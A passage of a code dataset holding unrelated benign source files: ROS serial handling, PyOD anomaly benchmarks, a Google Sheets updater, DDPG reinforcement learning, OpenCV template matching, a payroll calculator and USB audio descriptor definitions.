temp_pub_topic = '/battery_temps'\n rospy.loginfo('Begining to publish to \"' + temp_pub_topic + '\" topic')\n tempPub = rospy.Publisher(temp_pub_topic, Point, queue_size=10)\n\n fan_speeds_pub_topic = '/fan_speeds'\n rospy.loginfo('Beginning to publish to \"' + fan_speeds_pub_topic + '\" topic')\n fanSpeedsPub = rospy.Publisher(fan_speeds_pub_topic, Point, queue_size=10)\n\n error_flags_topic = '/pds_flags'\n rospy.loginfo('Beginning to publish to \"' + error_flags_topic + '\" topic')\n flagsPub = rospy.Publisher(error_flags_topic, String, queue_size=10)\n\n feedback_pub_topic = '/pds_feedback'\n rospy.loginfo('Beginning to publish to \"' + feedback_pub_topic + '\" topic')\n feedbackPub = rospy.Publisher(feedback_pub_topic, String, queue_size=10)\n\n subscribe_topic = '/pds_command'\n rospy.loginfo('Beginning to subscribe to \"' + subscribe_topic + '\" topic')\n sub = rospy.Subscriber(subscribe_topic, String, subscriber_callback)\n\n service_name = '/pds_request'\n rospy.loginfo('Waiting for \"'+service_name+'\" service request from client')\n serv = rospy.Service(service_name, ArmRequest, handle_client)\n\n init_serial()\n\n # service requests are implicitly handled but only at the rate the node publishes at\n global ser\n global reqFeedback\n reqFeedback = ''\n global reqInWaiting\n reqInWaiting = False\n try:\n while not rospy.is_shutdown():\n #if I try reading from the serial port inside callbacks, bad things happen\n #instead I send the data elsewhere if required but only read from serial here.\n #not sure if I need the same precautions when writing but so far it seems ok.\n if ser.in_waiting:\n data = ''\n feedback = None\n try:\n data = ser.readline().decode()\n feedback = stripFeedback(data)\n except Exception as e:\n print(\"type error: \" + str(e))\n rospy.logwarn('trouble reading from serial port')\n if feedback is not None:\n if feedback.startswith('PDS '):\n nada,feedback=feedback.split('PDS ')\n publish_pds_data(feedback)\n else:\n if reqInWaiting:\n reqFeedback += feedback+'\\r\\n' #pass data to request handler\n else:\n if 'WARNING' in feedback:\n rospy.logwarn(feedback)\n #rospy.loginfo(feedback)\n feedbackPub.publish(feedback)\n else:\n rospy.loginfo('got raw data: ' + data)\n rospy.Rate(100).sleep()\n except rospy.ROSInterruptException:\n pass\n\n def shutdown_hook():\n rospy.logwarn('This node (' + node_name + ') is shutting down')\n ser.close() # good practice to close the serial port\n # do I need to clear the serial buffer too?\n time.sleep(1) # give ROS time to deal with the node closing (rosbridge especially)\n\n rospy.on_shutdown(shutdown_hook)\n","sub_path":"robot/rospackages/src/mcu_control/scripts/PdsNode.py","file_name":"PdsNode.py","file_ext":"py","file_size_in_byte":13618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"7359546","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom diff_plt import diff_hist\nimport os\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\npath = \"./数据挖掘互评作业四数据集/abalone_benchmarks/abalone/benchmarks\"\n\nfile_list = []\n\nfor _ in os.listdir(path):\n file_list.append(path + '/' + _)\n\n\n\"\"\"\n#这段代码用来提取所有csv文件中的公共列,结果如下,比较耗时,故将其注释,如需要可解除注释\n\n#公共列为: ['ground.truth', 'V2', 'diff.score', 'original.label', 'motherset', 'V1', 'origin', 'V4', 'V3', 'V7', 'V5', 'V6']\n\ndef extra_same_elem(list1, list2): #这个函数用于提取两个列表的共同元素\n set1 = set(list1)\n set2 = set(list2)\n iset = set1.intersection(set2)\n return list(iset)\n\nlist1 = pd.read_csv(file_list[0], index_col=0).columns\n\nprint(\"提取所有csv文件中的公共列:\")\nfor file in tqdm(file_list[1:]):\n list2 = pd.read_csv(file, index_col=0).columns\n list1 = extra_same_elem(list1, list2)\n\nprint(\"公共列为:\", list1)\n\ncolumns = list1\n\"\"\"\n\ncolumns = ['V2', 'diff.score', 'original.label', 'V1', 'V4', 'V3', 'V7', 'V5', 'V6']\n\nfrom pyod.models.knn import KNN # imprt kNN分类器\nfrom pyod.models.lof import LOF\nfrom pyod.models.pca import PCA\nfrom pyod.models.iforest import IForest\n\n\nfrom pyod.utils.data import evaluate_print\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.utils import column_or_1d\nfrom sklearn.utils import check_consistent_length\n\nfrom pyod.utils.utility import precision_n_scores\n\nknn_roc = []\nknn_prn = []\nlof_roc = []\nlof_prn = []\npca_roc = []\npca_prn = []\niforest_roc = []\niforest_prn = []\n\nfor file in file_list:\n try:\n print(file)\n data = pd.read_csv(file, index_col=0)\n #data = data[data['ground.truth'] == 'nominal']\n #data = data[columns]\n data_len = len(data)\n data.loc[data['ground.truth'] == 'anomaly','ground.truth'] = 1\n data.loc[data['ground.truth'] == 'nominal','ground.truth'] = 0\n\n\n x = data[columns]\n y = data['ground.truth']\n #print(x)\n #print(y)\n\n\n X_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=1)\n\n clf_name = 'KNN'\n clf = KNN() # 初始化检测器clf\n clf.fit(X_train) # 使用X_train训练检测器clf\n\n # 返回训练数据X_train上的异常标签和异常分值\n y_train_pred = clf.labels_ # 返回训练数据上的分类标签 (0: 正常值, 1: 异常值)\n y_train_scores = clf.decision_scores_ # 返回训练数据上的异常值 (分值越大越异常)\n print(\"On train Data:\")\n evaluate_print(clf_name, y_train, y_train_scores)\n\n # 用训练好的clf来预测未知数据中的异常值\n y_test_pred = clf.predict(X_test) # 返回未知数据上的分类标签 (0: 正常值, 1: 异常值)\n y_test_scores = clf.decision_function(X_test) # 返回未知数据上的异常值 (分值越大越异常)\n print(\"On Test Data:\")\n evaluate_print(clf_name, y_test, y_test_scores)\n\n y_true = column_or_1d(y_test)\n y_pred = column_or_1d(y_test_scores)\n check_consistent_length(y_true, y_pred)\n\n roc = np.round(roc_auc_score(y_true, y_pred), decimals=4),\n prn = np.round(precision_n_scores(y_true, y_pred), decimals=4)\n knn_roc.append(roc)\n knn_prn.append(prn)\n\n\n clf_name = 'LOF'\n clf = LOF() # 初始化检测器clf\n clf.fit(X_train) # 使用X_train训练检测器clf\n\n # 返回训练数据X_train上的异常标签和异常分值\n y_train_pred = clf.labels_ # 返回训练数据上的分类标签 (0: 正常值, 1: 异常值)\n y_train_scores = clf.decision_scores_ # 返回训练数据上的异常值 (分值越大越异常)\n print(\"On train Data:\")\n evaluate_print(clf_name, y_train, y_train_scores)\n\n # 用训练好的clf来预测未知数据中的异常值\n y_test_pred = clf.predict(X_test) # 返回未知数据上的分类标签 (0: 正常值, 1: 异常值)\n y_test_scores = clf.decision_function(X_test) # 返回未知数据上的异常值 (分值越大越异常)\n print(\"On Test Data:\")\n evaluate_print(clf_name, y_test, y_test_scores)\n\n y_true = column_or_1d(y_test)\n y_pred = column_or_1d(y_test_scores)\n check_consistent_length(y_true, y_pred)\n\n roc = np.round(roc_auc_score(y_true, y_pred), decimals=4),\n prn = np.round(precision_n_scores(y_true, y_pred), decimals=4)\n lof_roc.append(roc)\n lof_prn.append(prn)\n\n clf_name = 'PCA'\n clf = PCA() # 初始化检测器clf\n clf.fit(X_train) # 使用X_train训练检测器clf\n\n # 返回训练数据X_train上的异常标签和异常分值\n y_train_pred = clf.labels_ # 返回训练数据上的分类标签 (0: 正常值, 1: 异常值)\n y_train_scores = clf.decision_scores_ # 返回训练数据上的异常值 (分值越大越异常)\n print(\"On train Data:\")\n evaluate_print(clf_name, y_train, y_train_scores)\n\n # 用训练好的clf来预测未知数据中的异常值\n y_test_pred = clf.predict(X_test) # 返回未知数据上的分类标签 (0: 正常值, 1: 异常值)\n y_test_scores = clf.decision_function(X_test) # 返回未知数据上的异常值 (分值越大越异常)\n print(\"On Test Data:\")\n evaluate_print(clf_name, y_test, y_test_scores)\n\n y_true = column_or_1d(y_test)\n y_pred = column_or_1d(y_test_scores)\n check_consistent_length(y_true, y_pred)\n\n roc = np.round(roc_auc_score(y_true, y_pred), decimals=4),\n prn = np.round(precision_n_scores(y_true, y_pred), decimals=4)\n pca_roc.append(roc)\n pca_prn.append(prn)\n\n clf_name = 'IForest'\n clf = IForest() # 初始化检测器clf\n clf.fit(X_train) # 使用X_train训练检测器clf\n\n # 返回训练数据X_train上的异常标签和异常分值\n y_train_pred = clf.labels_ # 返回训练数据上的分类标签 (0: 正常值, 1: 异常值)\n y_train_scores = clf.decision_scores_ # 返回训练数据上的异常值 (分值越大越异常)\n print(\"On train Data:\")\n evaluate_print(clf_name, y_train, y_train_scores)\n\n # 用训练好的clf来预测未知数据中的异常值\n y_test_pred = clf.predict(X_test) # 返回未知数据上的分类标签 (0: 正常值, 1: 异常值)\n y_test_scores = clf.decision_function(X_test) # 返回未知数据上的异常值 (分值越大越异常)\n print(\"On Test Data:\")\n evaluate_print(clf_name, y_test, y_test_scores)\n\n y_true = column_or_1d(y_test)\n y_pred = column_or_1d(y_test_scores)\n check_consistent_length(y_true, y_pred)\n\n roc = np.round(roc_auc_score(y_true, y_pred), decimals=4),\n prn = np.round(precision_n_scores(y_true, y_pred), decimals=4)\n iforest_roc.append(roc)\n iforest_prn.append(prn)\n except:\n print(\"出现预测值全为一种的情况。跳过\")\n continue\n\n\n\n\n\nprint('KNN average ROC:', np.average(knn_roc))\nprint('KNN average PRN:', np.average(knn_prn))\nprint('LOF average ROC:', np.average(lof_roc))\nprint('LOF average PRN:', np.average(lof_prn))\nprint('PCA average ROC:', np.average(pca_roc))\nprint('PCA average PRN:', np.average(pca_prn))\nprint('IForest average ROC:', np.average(iforest_roc))\nprint('IForest average PRN:', np.average(iforest_prn))\n\n\n\n\n\nroc_all = [np.average(knn_roc), np.average(lof_roc), np.average(pca_roc), np.average(iforest_roc)]\nprn_all = [np.average(knn_prn), np.average(lof_prn), np.average(pca_prn), np.average(iforest_prn)]\nnames = ['KNN', 'LOF', 'PCA', 'IForest']\n\nplt.figure(figsize=(10, 10), dpi=80)\n# 再创建一个规格为 1 x 1 的子图\n# plt.subplot(1, 1, 1)\n# 柱子总数\nN = 4\n# 包含每个柱子对应值的序列\nvalues = roc_all\n# 包含每个柱子下标的序列\nindex = np.arange(N)\n# 柱子的宽度\nwidth = 0.45\n# 绘制柱状图, 每根柱子的颜色为紫罗兰色\np2 = plt.bar(index, values, width, label=\"ROC\", color=\"#87CEFA\")\n# 设置横轴标签\nplt.xlabel('algorithm')\n# 设置纵轴标签\nplt.ylabel('ROC')\n# 添加标题\nplt.title('')\n# 添加纵横轴的刻度\nplt.xticks(index, ('KNN', 'LOF', 'PCA', 'IForest'))\n# plt.yticks(np.arange(0, 10000, 10))\n# 添加图例\nplt.legend(loc=\"upper right\")\nplt.show()\n\n\n\n\nplt.figure(figsize=(10, 10), dpi=80)\n# 再创建一个规格为 1 x 1 的子图\n# plt.subplot(1, 1, 1)\n# 柱子总数\nN = 4\n# 包含每个柱子对应值的序列\nvalues = prn_all\n# 包含每个柱子下标的序列\nindex = np.arange(N)\n# 柱子的宽度\nwidth = 0.45\n# 绘制柱状图, 每根柱子的颜色为紫罗兰色\np2 = plt.bar(index, values, width, label=\"ROC\", color=\"#8000FA\")\n# 设置横轴标签\nplt.xlabel('algorithm')\n# 设置纵轴标签\nplt.ylabel('PRN')\n# 添加标题\nplt.title('')\n# 添加纵横轴的刻度\nplt.xticks(index, ('KNN', 'LOF', 'PCA', 'IForest'))\n# plt.yticks(np.arange(0, 10000, 10))\n# 添加图例\nplt.legend(loc=\"upper right\")\nplt.show()\n\n\n\n\n\n\n\n\n","sub_path":"abalone_benchmarks_analysis.py","file_name":"abalone_benchmarks_analysis.py","file_ext":"py","file_size_in_byte":9243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"364634934","text":"import sys\nimport re\nimport gspread\nimport time\nfrom gspread_formatting import *\nfrom datetime import date\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nscope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']\n\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('is2800-1166f40193c8.json', scope)\n\n# Authorize\ngsheet = gspread.authorize(credentials)\n# Open workbook\n#workbook = gsheet.open('Excel_Chapter4_Scorecard_007')\nworkbook = gsheet.open('test')\n# Get worksheets\nworksheets = workbook.worksheets() \n\nbody = {\"requests\": []}\n\ndef getScaledScore(sID, target):\n colDLength = len(target)\n target = colDLength + 1\n #score = \"=D\" + str(target-1) + \"/100*25\"\n score = \"=D\" + str(colDLength) + \"/100*25\"\n body['requests'].append(\n {\"updateCells\": {\n 'range': {\n \"sheetId\": sID,\n \"startRowIndex\": target - 1 ,\n \"endRowIndex\": target,\n \"startColumnIndex\": 3,\n \"endColumnIndex\": 4\n },\n 'rows': [{\n \"values\": [{\n \"userEnteredValue\": {\n \"formulaValue\": score\n },\n \"userEnteredFormat\": {\n \"textFormat\": {\n \"bold\": True\n }\n }\n }]\n }],\n \"fields\": \"*\"\n }}\n )\n #return body\n\n##zeroValues = []\n#Loop through column D values and get the index for zero values\nstart = 11 \nfor index, item in enumerate(worksheets):\n source = str(item)\n if index >= start:\n columnDItems = item.col_values(4)\n colDLength = len(columnDItems)\n sID = re.search('id:(.+?)>', source).group(1)\n colDTarget = colDLength + 1\n getScaledScore(sID, columnDItems)\n\nprint(body)\nworkbook.batch_update(body=body)","sub_path":"get_scaled_score_old.py","file_name":"get_scaled_score_old.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"399202629","text":"# -*- coding: utf-8 -*-\n# created by inhzus\n\nimport re\n\nfrom colorama import Fore, Style\n\nfrom juq.serializer import DocDetailSerializer\n\n\ndef filter_empty_params(params: dict):\n params.pop('_')\n return {k: v for k, v in params.items() if v or isinstance(v, int)}\n\n\ndef toc_line_repr(line: dict):\n return f'{Fore.RED}|-' * line['depth'] + \\\n f'{Style.RESET_ALL}' \\\n f'id: {Fore.BLUE}{line[\"id\"]}{Style.RESET_ALL}\\t' \\\n f'slug: {Fore.BLUE}{line[\"slug\"]}{Style.RESET_ALL}\\t' \\\n f'title: {Fore.BLUE}{line[\"title\"]}{Style.RESET_ALL}'\n\n\ndef toc_repr(toc_: list):\n if not toc_:\n return ''\n return '\\n'.join(map(toc_line_repr, toc_))\n\n\n# e.g. ' - [标题](slug \"12312\")'\n# ' ', '标题', 'slug', '12312'\npattern = re.compile(r'^(?P\\s*?)' # get depth on blank numbers\n r'-\\s'\n r'\\[(?P.*)\\]' # title between square brackets\n r'\\((?P<slug>\\S*)' # slug after left bracket\n r'\\s'\n r'\"(?P<id>\\d*)\"\\)', # id before right bracket\n re.X)\n\n\ndef load_toc_line(line: str):\n matches = pattern.match(line)\n return {'depth': int(len(matches['depth']) / 2), 'title': matches['title'],\n 'slug': matches['slug'], 'id': matches['id']}\n\n\ndef load_toc(toc_: str):\n # for line in toc_.split('\\n'):\n # yield load_toc_line(line)\n if not toc_:\n return []\n return list(map(load_toc_line, toc_.split('\\n')))\n\n\ndef dump_toc_line(line: dict):\n return ' ' * line['depth'] + \\\n f'- [{line[\"title\"]}]' \\\n f'({line[\"slug\"]} \\\"{line[\"id\"]}\\\")'\n\n\ndef dump_toc(toc_list):\n return '\\n'.join(map(dump_toc_line, toc_list))\n\n\ndef change_doc_toc(toc: str, insert: DocDetailSerializer, before: str, after: str, depth: int = 0):\n\n if before:\n after = before\n if toc:\n src_toc = load_toc(toc if toc else '')\n else:\n src_toc = []\n toc_list = [line for line in src_toc if line['id'] != str(insert.id)]\n insert_toc = {'depth': depth, 'title': insert.title, 'slug': insert.slug, 'id': insert.id}\n if not before and not after:\n toc_list.append(insert_toc)\n return toc_list\n # Find the pos to insert after/before\n for i, line in enumerate(toc_list):\n if line['id'] == after:\n idx = i if before else i + 1\n break\n else:\n return src_toc\n toc_list.insert(idx, insert_toc)\n return toc_list\n","sub_path":"juq/service/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"520897143","text":"# Maxim Shelopuhin\n# DDPG on Bipedal Walker\n# \n#\tNoise function based on http://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab\n#\t\t\t\t\tand https://github.com/openai/baselines/blob/master/baselines/ddpg/noise.py\n#\tNetwork architecture based on https://github.com/vy007vikas/PyTorch-ActorCriticRL\n#\tAlgorithm based on \"Continuous control with deep reinforcement learning\"\n#\t\t\t\t\tby Timothy P. Lillicrap, Jonathan J. Hunt, Alexander Pritzel, Nicolas Heess, Tom Erez, Yuval Tassa, David Silver, Daan Wierstra\n#\t\nimport gym\nfrom Memory import Memory\nfrom ActorCritic import ActorCritic\nimport numpy as np\nimport gc\nimport matplotlib.pyplot as plt\nimport sys\nimport time\n\nMAX_EPISODES = 5000\nMAX_STEPS = 10000\nMAX_BUFFER = 200000\nMAX_TOTAL_REWARD = 300\n\n#Train for a single run\n# Training done with exploration = true\ndef env_run(env, episode, trainer, memory, train):\n\tstate = env.reset()\n\tepoch_reward = 0\n\tprint(episode)\n# Take step\n\tfor step in range(MAX_STEPS):\n\t\tif not train:\n\t\t\tenv.render()\n\t\taction = trainer.get_action(state, train)\n\t\tnext_state, reward, done, _ = env.step(action)\n\t\tepoch_reward +=reward\n\t\tif train:\n\t\t\tif done:\n\t\t\t\tbreak\n\t\t\tmemory.remember((state, action, reward, next_state))\n\t\t\tstate = next_state\n\t\t\ttrainer.optimize()\n\t\telse:\n\t\t\tif done:\n\t\t\t\tenv.close()\n\t\t\t\tprint(\"\\n Testing agent got a reward of :\",epoch_reward)\n\t\t\t\tbreak\n\t\t\n\t\tstate = next_state\n\tgc.collect()\n\tif episode%100 == 1:\n\t\ttrainer.save_models(episode)\n\treturn epoch_reward\n\ndef prepopulate_memory(memory, env):\n\tstate = env.reset()\n\tfor _ in range(MAX_BUFFER):\n\t# Take a random action\n\t\taction = env.action_space.sample()\n\t\tnext_state, reward, done, _ = env.step(action)\n\t\tmemory.remember((state, action, reward, next_state))\n\t\tif done:\n\t\t\tstate = env.reset()\n\t\telse:\n\t\t\tstate = next_state\n\n# Create environment\n# Read arguments\n# Depending on args:\n#\tdecide if training\n#\tdetermine the testing interval\n#\tdetermine which file to load\n#\toutput stats to the screen\ndef main(args):\n\n\ttraining = int(args[1])\n\ttest_interwal = int(args[2])\n\tload = int(args[3])\n\n\tenv = gym.make('BipedalWalker-v2')\n\tmemory = None\n\n\tif training == 1:\n\t\tmemory = Memory(MAX_BUFFER)\n\t\tprepopulate_memory(memory, env)\n\t\t\n\trewards = []\n\tstart_time = time.time()\n\tmax_reward = 0\n\n\ttrainer = ActorCritic(env.observation_space.shape[0], env.action_space.shape[0], memory, load)\n\n\tfor episode in np.arange(MAX_EPISODES):\n\t\tif training == 1:\n\t\t\tenv_run(env, episode, trainer, memory, True)\n\t\tif episode%test_interwal == 0:\n\t\t\tmax_reward += env_run(env, episode,trainer, None, False)\n\t\t\trewards.append(max_reward/((episode/test_interwal)+1))\n\tplt.plot(rewards)\n\tplt.show()\n\n# use this to plot Ornstein Uhlenbeck random motion\nif __name__ == '__main__':\n\tmain(sys.argv)","sub_path":"DDPG/DDPG.py","file_name":"DDPG.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"325947004","text":"import itertools\n\ndef altsum(ls):\n add=True\n s=0\n for l in ls:\n if (add):\n s+=l\n else:\n s-=l\n add=not add\n return s\n\ndef main():\n print (\"Running\")\n digits = list(range(10))\n perms = itertools.permutations(digits)\n count = 0\n for ps in perms:\n if ps[0] > 0:\n s = altsum(ps) \n if (0 == s):\n count += 1\n if (0 == s%11):\n count+=1\n return count\n\nif __name__==\"main\":\n main()\n\n\n","sub_path":"Python/E491/E491/E491.py","file_name":"E491.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"526316433","text":"#Encoding:UTF-8\n#Autor:Manuel Zavala Gómez\n#Calculo de pago de un trabajador\n\ndef main():\n normal=int(input(\"Horas normales trabajadas\"))\n extra=int(input(\"Horas extra trabajadas\"))\n pago=int(input(\"Pago por hora normal\"))\n print(\"Horas normales:\",normal)\n print(\"Horas extras:\",extra)\n print(\"Pago por hora:$%.2f\"% pago) \n calcularNormal(normal,pago)\n calcularExtra(normal,extra,pago) \ndef calcularNormal(normal,pago):\n a=normal*pago\n print(\"Pago semanal normal:$%.2f\"% a)\ndef calcularExtra(normal,extra,pago):\n b=(pago/2)+ pago\n c= b*extra\n d= (normal*pago)+c\n print(\"Pago semanal extra:$%.3f\" % c)\n print(\"Pago semanal total:$%.2f\"%d) \nmain() ","sub_path":"calculopago.py","file_name":"calculopago.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"329450992","text":"import cv2\nimport numpy as np\nimport os\n\ndef template_matching(image,template):\n\t# convert both the image and template to grayscale\n\timageGray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\ttemplateGray = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)\n\n\t#print(\"performing template matching...\")\n\t#methods:- cv2.TM_SQDIFF(take minLoc)--------- cv2.TM_CCORR_NORMED(take maxLoc)\n\tresult = cv2.matchTemplate(imageGray, templateGray, cv2.TM_SQDIFF) \n\t(minVal, maxVal, minLoc, maxLoc) = cv2.minMaxLoc(result)\n\n\t# determine the starting and ending (x, y)-coordinates of the\n\t# bounding box\n\t(startX, startY) = minLoc\n\tendX = startX + template.shape[1]\n\tendY = startY + template.shape[0]\n\n\t# draw the bounding box on the image\n\tcv2.rectangle(image, (startX, startY), (endX, endY), (255, 0, 0), 3)\n\treturn image,(startX,startY,endX,endY)\n\t\n\nif __name__==\"__main__\":\n\tgt = np.genfromtxt(\"../data/Liquor/groundtruth_rect.txt\",delimiter=',')\n\tcoord = gt[0]\n\timg_path = \"../data/Liquor/img/\"\n\timgname = \"0001.jpg\"\n\tx,y,w,h = int(coord[0]),int(coord[1]),int(coord[2]),int(coord[3])\n\n\timage = cv2.imread(img_path+imgname)\n\ttemplate = image[y:y+h,x:x+w]\n\n\tcv2.imwrite(\"./template.png\",template)\n\tfilenames = os.listdir(img_path)\n\tfilenames.sort()\n\n\tiou = 0.0\n\tn = 0\n\tfile1 = open('./pred_liquor.txt', 'w')\n\tfor i,filename in enumerate(filenames):\n\t\tprint(filename)\n\t\tcoord = gt[i]\n\t\tx1,y1,x2,y2 = int(coord[0]),int(coord[1]),int(coord[0])+int(coord[2]),int(coord[1])+int(coord[3])\n\n\t\timg = cv2.imread(img_path+filename)\n\t\timg ,(px1,py1,px2,py2) = template_matching(img,template)\n\n\t\ts = str(px1)+\",\"+str(py1)+\",\"+str(template.shape[1])+\",\"+str(template.shape[0])\n\t\tfile1.write(s+'\\n')\n\t\tcv2.imwrite(\"./block_based_predicted/liquor/\"+filename,img)\n\t\tn+=1\n\t\n","sub_path":"Assignment2/Q1/liquor.py","file_name":"liquor.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"215112809","text":"#\n# This file is part of usb-protocol.\n#\n\"\"\" descriptors specific to USB version 2\n NOTE: This is not complete yet and will be extended as needed\n\"\"\"\n\nfrom usb_protocol.emitters import descriptor\nfrom enum import IntEnum\n\nimport construct\n\nfrom ..descriptor import \\\n DescriptorField, DescriptorNumber, DescriptorFormat\n\nfrom .uac import *\n\nclass ClockAttributes(IntEnum):\n EXTERNAL_CLOCK = 0b00\n INTERNAL_FIXED_CLOCK = 0b01\n INTERNAL_VARIABLE_CLOCK = 0b10\n INTERNAL_PROGRAMMABLE_CLOCK = 0b11\n\nclass ClockFrequencyControl(IntEnum):\n NOT_PRESENT = 0b00\n HOST_READ_ONLY = 0b01\n HOST_PROGRAMMABLE = 0b11\n\nclass CopyProtectControl(IntEnum):\n NOT_PRESENT = 0b00\n HOST_READ_ONLY = 0b10\n HOST_PROGRAMMABLE = 0b11\n\nclass ConnectorControl(IntEnum):\n NOT_PRESENT = (0b00) << 2\n HOST_READ_ONLY = (0b10) << 2\n HOST_PROGRAMMABLE = (0b11) << 2\n\nclass OverloadControl(IntEnum):\n NOT_PRESENT = (0b00) << 4\n HOST_READ_ONLY = (0b10) << 4\n HOST_PROGRAMMABLE = (0b11) << 4\n\nclass ClusterControl(IntEnum):\n NOT_PRESENT = (0b00) << 6\n HOST_READ_ONLY = (0b10) << 6\n HOST_PROGRAMMABLE = (0b11) << 6\n\nclass UnderflowControl(IntEnum):\n NOT_PRESENT = (0b00) << 8\n HOST_READ_ONLY = (0b10) << 8\n HOST_PROGRAMMABLE = (0b11) << 8\n\nclass OverflowControl(IntEnum):\n NOT_PRESENT = (0b00) << 10\n HOST_READ_ONLY = (0b10) << 10\n HOST_PROGRAMMABLE = (0b11) << 10\n\n\nclass FormatTypes(IntEnum):\n FORMAT_TYPE_UNDEFINED = 0x00\n FORMAT_TYPE_I = 0x01\n FORMAT_TYPE_II = 0x02\n FORMAT_TYPE_III = 0x03\n FORMAT_TYPE_IV = 0x04\n EXT_FORMAT_TYPE_I = 0x81\n EXT_FORMAT_TYPE_II = 0x82\n EXT_FORMAT_TYPE_III = 0x83\n\nclass TypeIFormats(IntEnum):\n PCM = (1 << 0)\n PCM8 = (1 << 1)\n IEEE_FLOAT = (1 << 2)\n ALAW = (1 << 3)\n MULAW = (1 << 4)\n TYPE_I_RAW_DATA = (1 << 31)\n\nclass TypeIIFormats(IntEnum):\n MPEG = (1 << 0)\n AC_3 = (1 << 1)\n WMA = (1 << 2)\n DTS = (1 << 3)\n TYPE_II_RAW_DATA = (1 << 31)\n\nclass TypeIIIFormats(IntEnum):\n IEC61937_AC_3 = (1 << 0)\n IEC61937_MPEG_1_Layer1 = (1 << 1)\n IEC61937_MPEG_1_Layer2_3 = (1 << 2) # same bit!\n IEC61937_MPEG_2_NOEXT = (1 << 2) # same bit!\n IEC61937_MPEG_2_EXT = (1 << 3)\n IEC61937_MPEG_2_AAC_ADTS = (1 << 4)\n IEC61937_MPEG_2_Layer1_LS = (1 << 5)\n IEC61937_MPEG_2_Layer2_3_LS = (1 << 6)\n IEC61937_DTS_I = (1 << 7)\n IEC61937_DTS_II = (1 << 8)\n IEC61937_DTS_III = (1 << 9)\n IEC61937_ATRAC = (1 << 10)\n IEC61937_ATRAC2_3 = (1 << 11)\n TYPE_III_WMA = (1 << 12)\n\nclass TypeIVFormats(IntEnum):\n PCM = (1 << 0)\n PCM8 = (1 << 1)\n IEEE_FLOAT = (1 << 2)\n ALAW = (1 << 3)\n MULAW = (1 << 4)\n MPEG = (1 << 5)\n AC_3 = (1 << 6)\n WMA = (1 << 7)\n IEC61937_AC_3 = (1 << 8)\n IEC61937_MPEG_1_Layer1 = (1 << 9)\n IEC61937_MPEG_1_Layer2_3 = (1 << 10) # same bit!\n IEC61937_MPEG_2_NOEXT = (1 << 10) # same bit!\n IEC61937_MPEG_2_EXT = (1 << 11)\n IEC61937_MPEG_2_AAC_ADTS = (1 << 12)\n IEC61937_MPEG_2_Layer1_LS = (1 << 13)\n IEC61937_MPEG_2_Layer2_3_LS = (1 << 14)\n IEC61937_DTS_I = (1 << 15)\n IEC61937_DTS_II = (1 << 16)\n IEC61937_DTS_III = (1 << 17)\n IEC61937_ATRAC = (1 << 18)\n IEC61937_ATRAC2_3 = (1 << 19)\n TYPE_III_WMA = (1 << 20)\n IEC60958_PCM = (1 << 21)\n\nclass SidebandProtocols(IntEnum):\n PROTOCOL_UNDEFINED = 0x00\n PRES_TIMESTAMP_PROTOCOL = 0x02\n\nclass AudioClassSpecificASInterfaceDescriptorSubtypes(IntEnum):\n AS_DESCRIPTOR_UNDEFINED = 0x00\n AS_GENERAL = 0x01\n FORMAT_TYPE = 0x02\n ENCODER = 0x03\n DECODER = 0x04\n\nInterfaceAssociationDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(8, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(DescriptorTypes.INTERFACE_ASSOCIATION),\n \"bFirstInterface\" / DescriptorField(description=\"Interface number of the first interface that is associated with this function.\", default=0),\n \"bInterfaceCount\" / DescriptorField(description=\"Number of contiguous interfaces that are associated with this function\"),\n \"bFunctionClass\" / DescriptorNumber(AudioFunctionClassCode.AUDIO_FUNCTION),\n \"bFunctionSubClass\" / DescriptorField(description=\"function subclass code (currently not used in uac2)\", default=AudioFunctionCategoryCodes.FUNCTION_SUBCLASS_UNDEFINED), \n \"bFunctionProtocol\" / DescriptorNumber(AudioFunctionProtocolCodes.AF_VERSION_02_00),\n \"iFunction\" / DescriptorField(description=\"Index of a string descriptor that describes this interface\", default=0),\n)\n\nStandardAudioControlInterfaceDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(9, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(DescriptorTypes.INTERFACE),\n \"bAlternateSetting\" / DescriptorField(description=\"alternate setting for the interface (must be 0)\", default=0),\n \"bNumEndpoints\" / DescriptorField(description=\"number of endpoints used by this interface (excluding endpoint 0). This number is either 0 or 1 if the optional interrupt endpoint is present\", default=0),\n \"bInterfaceClass\" / DescriptorNumber(AudioInterfaceClassCode.AUDIO),\n \"bInterfaceSubClass\" / DescriptorNumber(AudioInterfaceSubclassCodes.AUDIO_CONTROL),\n \"bInterfaceProtocol\" / DescriptorNumber(AudioInterfaceProtocolCodes.IP_VERSION_02_00),\n \"iInterface\" / DescriptorField(description=\"index of string descriptor describing this interface\", default=0),\n)\n\nClassSpecificAudioControlInterfaceDescriptor = 